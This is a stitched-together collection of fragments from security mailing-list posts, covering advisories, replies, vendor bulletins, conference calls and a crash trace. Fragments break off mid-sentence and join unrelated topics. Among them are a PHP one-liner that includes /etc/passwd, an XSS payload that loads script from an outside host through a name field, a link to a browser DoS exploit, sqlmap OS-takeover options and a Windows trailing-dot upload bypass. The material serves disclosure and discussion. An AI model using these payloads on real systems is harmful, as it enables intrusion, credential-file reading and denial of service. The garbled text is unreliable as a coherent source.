work
php -r 'include("/etc/passwd/");'
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
As you can see the file is successfully included (it works with every
single filesystem function of PHP that makes use of _php_stream_fopen()
and similar functions).
This is also part of the vector discovered by barbarianbob, while he
uses it for different purposes from what I initially thought.
of ``eval'' in some other languages. Throughout Vim, arguments passed to
``execute'' are not sanitized properly. This can lead to arbitrary code
execution. We will show several exploits which execute arbitrary code upon
opening a crafted file with the ex(1), vim(1), or view(1) commands. Only in
few cases will we explore the possibility of remote exploitation. We will
present fixes/workarounds to some of the vulnerabilities.
The archive with code that is a part of this advisory can be found at
``http://www.rdancer.org/vulnerablevim.tar.bz2''.
5. *Non-vulnerable packages*
. Microsoft virtualization products that are based on Hyper-V technology.
6. *Vendor Information, Solutions and Workarounds*
This issue was reported to Microsoft in August 2009. The vendor has
acknowledged the report and after extensive analysis indicated that it
plans to solve the problem in future updates to the associated products.
Hi,
Just wanted to add a quick update on affected systems since I forgot to mention webservers along with wordpress versions in my advisory.
Some people are wondering why the vulnerability doesn't work on their system.
I'm pretty sure that the exploit won't work on web servers other than Apache (as they probably won't process extensions other than the last one). So non-Apache-based servers are probably safe here.
Whether it will work on your Apache server or not depends on your mod_php configuration.
The exploit won't work on servers where PHP scripts handling has been configured as follows:
<FilesMatch \.php$>
SetHandler application/x-httpd-php
DoS:
http://websecurity.com.ua/uploads/2010/Chrome%20&%20Opera%20DoS%20Exploit.html
This exploit for chrome protocol works in Google Chrome 1.0.154.48 and Opera
9.52.
In Chrome, blocking of the browser occurs. In Opera, resource consumption
(CPU and memory) occurs.
> So you tell you discovered this issue as
> well and you informed vendors, but the only vendor who really has RA
> support so far is Cisco, and they did not know.
We had worked on this thing for a while. IIRC, I talked with a few guys
about this in November 2010 or so (including, IIRC, some guys involved
in NDPMon)-- For instance, I posted on the ipv6ops mailing-list (in
November/December 2010) a few comments noting that RA-Guard could be evaded.
(And, FWIW, vendors have been sitting on a number of other ND issues
Protect to 2 for the best protection against SYN attacks. This value
adds additional delays to connection indications, and TCP connection
requests quickly timeout when a SYN attack is in progress. This
parameter is the recommended setting.
NOTE: The following socket options no longer work on any socket when you
set the SynAttackProtect value to 2: Scalable windows
-----
IIRC? This is called the "Silly Window Syndrome", & this is a way, in
I) Introduction
This is the second part and continuation of our previous "PHP filesystem
attack vectors" [1] research.
Working with s4tan and ascii on the "SugarCRM 5.2.0e Remote Code
Execution" advisory [2] we noticed a strange behaviour on Windows OS:
trying to upload a file named "a.php." results in just "a.php".
Analyzing this we noticed that every time an application, or manually,
was trying to open or save a file with one or more dots at the end,
and Opera (http://websecurity.com.ua/3194/). Or like DoS vulnerability in
Internet Explorer 7 (http://websecurity.com.ua/2872/), which is similar to
DoS vulnerabilities in Firefox, Opera and Chrome
(http://websecurity.com.ua/2456/), all of them are printing DoS attacks.
> This will ONLY work if FireFox does NOT know which program to use.
It's interesting, because as I understand from your first information that
it works in Firefox (via Chrome) and from your previous text ("that FireFox
knows exists on the target operating system"), it must work if Firefox does
KNOW which program to use. But in your case the DoS effect is better when
Don't worry about how the bad guys will place the JS code or a page with
iframes at a web site for this attack - it'll be their own problem. And if
they want to, they will do it. And after they have placed the attacking code
(JS or HTML) on the target site, it'll already be a problem for the users of
this site (who will not be able to work with it) and the admin of the site
(who, in addition to problems with working with the site, will also be left
without visitors on his site). There are always vulnerabilities on different
sites which can be used for this attack. And also the e-mail vector mentioned
by Vladimir can be used.
> Its called the "infinite loop".
Max Moser wrote:
> Dear Listmembers,
>
>
> Today the team remote-exploit.org together with Dreamlab Technologies would like
> to release another piece of unique research work.
>
> Although the trend in wireless communication in peripheral devices such as
> keyboards and mice is moving towards Bluetooth, market leaders such as
> Logitech and Microsoft rely on cost-efficient, tried-and-tested 27Mhz radio
> technology.
Maybe I am making a huge mistake by responding to your message, but
let's see. This is what I think about security in depth in a bit more
detail.
Let's say that we have a wireless network which is guarded by "security
in depth" network administrators. The first thing they will do is to
secure the actual network by some massive segmentation exercises...
then the connection with enhanced privacy/encryption schemes (WPA2).
They will put more layers on top of that. For example, the users
need to authenticate with client-side certificates. Now the network
Potential Security Impact: Local unqualified configuration change
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP-UX running the Ignite-UX or the DynRootDisk (DRD) get_system_info command. This command can change system networking parameters without notification.
References: none
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running the Ignite-UX vC.7.0, vC.7.1, vC.7.2, vC.7.3 or the DynRootDisk (DRD) vA.1.0.16.417, vA.1.0.18.245, vA.1.1.0.344, vA.2.0.0.592 get_system_info command.
new technology also developed by AOL and available for the public in the
form of a "light IM client".
A vulnerability was discovered in these three popular versions of AOL
Instant Messaging software, AIM 6.1 (and 6.2 beta), AIM Pro and AIM Lite,
which expose workstations running the IM clients and their users to
several immediate high-risk attack vectors. To support rendering of HTML
content, the vulnerable IM clients use an embedded Internet Explorer
server control. Unfortunately they do not properly sanitize the
potentially malicious input content to be rendered and, as a result, an
attacker might provide malicious HTML content as part of an IM message to
On 31-jul-2007, at 0:42, Hans Wolters wrote:
> Hi there,
>
> Anyone that knows how to contact responsible persons at uat.edu?
> root@ and security@ do not seem to work.
>
Thanks all for your suggestions. Current state:
abuse@ does not work and is listed in rfcignorant (since April this
Call For Papers -- BADGERS 2011
=============================================
The Program Committee for the first EuroSys Workshop on Building
Analysis Datasets and Gathering Experience Returns for Security (BADGERS)
invites you to submit your work.
Paper submissions are due January 31, 2011, 11:59 p.m. PST.
More information about the workshop can be found at:
=======
Along all the takeover features introduced in sqlmap 0.7 release
candidate 1, some of the new features include:
* Adapted Metasploit wrapping functions to work with latest 3.3
development version too.
* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
* Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or
--os-bof is selected) when running under Windows because msfconsole
and msfcli are not supported on the native Windows Ruby interpreter.
Good geeks ...not gook geeks.
It's not a racial slight, it's spellchecker not working and I didn't
realize I spelled it wrong. My deepest apologies if anyone reads that
wrong.
Hisashi T Fujinaka wrote:
> On Thu, 17 Sep 2009, Susan Bradley wrote:
>
>> <jaded mode off>
> :) In the end I realize, it sounds like a total over-haul of the TCP/IP
> stack is required; but does it really have to? Really?
>
> How effective is what Tom Grace suggests? Unless I'm misunderstanding, he's
> suggesting switching to an iptables based protection along with a registry
> tweak... ahh the good ol' batch firewall :) Would this actually work as a
> viable work-around? I realize M$ stated this as such, but given their
> current reputation it's really hard to take their word for anything these
> days :P
>
> What free/cheap client-level-IPS solutions block this current attack? Any
http://www.cpni.gov.uk/Docs/tn-03-09-security-assessment-TCP.pdf)
Earlier this year we published an IETF Internet-Draft version of this
document (available at:
http://www.gont.com.ar/drafts/tcp-security/draft-gont-tcp-security-00.txt)
in the hope of having the IETF further work on the TCP security paper UK
CPNI had published.
My personal take (possibly biased, since I am the document author)
is that this document has been the result of a lot of work (including
the work of the many people that reviewed the CPNI version of the
:) In the end I realize, it sounds like a total over-haul of the TCP/IP
stack is required; but does it really have to? Really?
How effective is what Tom Grace suggests? Unless I'm misunderstanding, he's
suggesting switching to an iptables based protection along with a registry
tweak... ahh the good ol' batch firewall :) Would this actually work as a
viable work-around? I realize M$ stated this as such, but given their
current reputation it's really hard to take their word for anything these
days :P
What free/cheap client-level-IPS solutions block this current attack? Any
Hey man - hope all is well.
FYI- I tried your example file and by default nothing worked on Windows 7. The "loading and embedded file" says "this file is blocked", The file spawn requires a script prompt with a "automation error" after that, the windows control panel didn't launch at all, and the files required me to save them, etc.
The text from the uri handler did work, but I'm not sure what the ramifications of that are. Oh, the Action Panel did show up.
I agree this isn't an "exploit" but I guess it is somewhat interesting. Of course, downloading random .chm files is akin to downloading any remote content-rendering document, except that .chm won't automatically run from the internet in the first place, even with your rendering code in it that must be accepted by the user to load in the first place.
As such (again, notwithstanding the mild interest around it) I'm confused by the "This was the response I expected" comment because if I read it right, it sounds as if you are being condemning for some reason. Are you saying "this is the response I expected" because it is the correct response and you are aware of what would be required to push out supported hotfixes for low impact issues, or are you saying "this is the response I expected" because you somehow think it SHOULD be hotfixed, but is not, and that is "typical" (as in "irresponsible") or something like that?
tries to call a function (at +2Ch on IE 6, +30h on IE 7) from the
vtable. This makes exploitability completely dependent on the
system's version of MSHTML.DLL, and all but rules out successful
exploitation in 64-bit Internet Explorer.
The mitigation works by replacing one function pointer in the vtable
with a pointer for which the low 2 bytes are 0xCCCC, but at which the
code is functionally equivalent. Legitimate virtual function calls
work as usual, while exploitation attempts will arrive at EIP =
0xCCCCxxxx (not exploitable) rather than 0xyyyyxxxx (exploitable for
some yyyy).
-:: Ways of abusing the HTML Injection and XSS ::-
The following are examples of what you can input as first- and/or last-name:
"><SCRIPT SRC=//intern0t.net/.j>
- Works only in FireFox and NetScape 8.1-G (Gecko)
Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based
partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE,
Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is
especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is
Hello Thierry!
> Your saying above that this attack works if "Initialise and script
> ActiveX control not marked as safe" is ENABLED.
This Saved XSS hole works even with this option disabled (i.e. with default
settings). But when we want to use ActiveX in our code (e.g. for Code
Execution attack), then such a problem occurs. It's a bug in IE (when there is
a preceding comment tag), which I found when researching the possibility of
making CE via XSS in IE. So I found the workaround for this bug - to set up this
90126c7c 872628e7 839f3c40 92baf9a8 0000ffff Npfs!NpCommonFileSystemControl+0x17b
90126c94 81c27fae 839f3c40 92baf9a8 92baf008 Npfs!NpFsdFileSystemControl+0x19
90126cac 901736d0 90827482 9016562c 92baf008 nt!IofCallDriver+0x63
90126d30 9015a39b 83a01dd8 83a01da0 92baf010 srv!SrvSmbWriteAndX+0x9a1
90126d54 9016be8d 00000000 8c3236b0 00000000 srv!SrvProcessSmb+0x151
90126d7c 81e25472 00a01da0 9012d680 00000000 srv!WorkerThread+0x12c
90126dc0 81c9141e 9016bd61 83a01da0 00000000 nt!PspSystemThreadStartup+0x9d
00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16
Srv.sys is the driver that will process the received SMB packet, once the packet is parsed it is routed through the proper driver. In this case, npfs.sys (named pipe filesystem driver). Npfs.sys handles named pipe requests. Below we can see how srv.sys parses some important fields of the packet:
Dear Peter Watkins,
PW> I don't know how small the salt universe would need to be before
PW> precomputing dictionaries would be worthwhile (vs. having a botnet only work
PW> on crypted passwords already captured), but certainly the obviously weak
PW> srand(time(NULL)) code only helps the black hats. And with modern OSes
PW> providing reasonably good entropy sources, there's little reason not to
PW> "do it right". It's not the worst mistake I've seen, by far not the most
PW> dangerous. But it's sloppy of the Apache Group to have ignored it for half
PW> a decade.
by the special interest group Security - Intrusion Detection and
Response (SIDAR) of the German Informatics Society (GI). The
conference proceedings will appear in Springer's Lecture Notes in
Computer Science (LNCS) series.
DIMVA solicits submission of high-quality, original scientific work.
This year we invite two types of paper submissions:
* Full papers, presenting novel and mature research results. Full
papers are limited to 20 pages, prepared according to the
instructions provided below. They will be reviewed by the program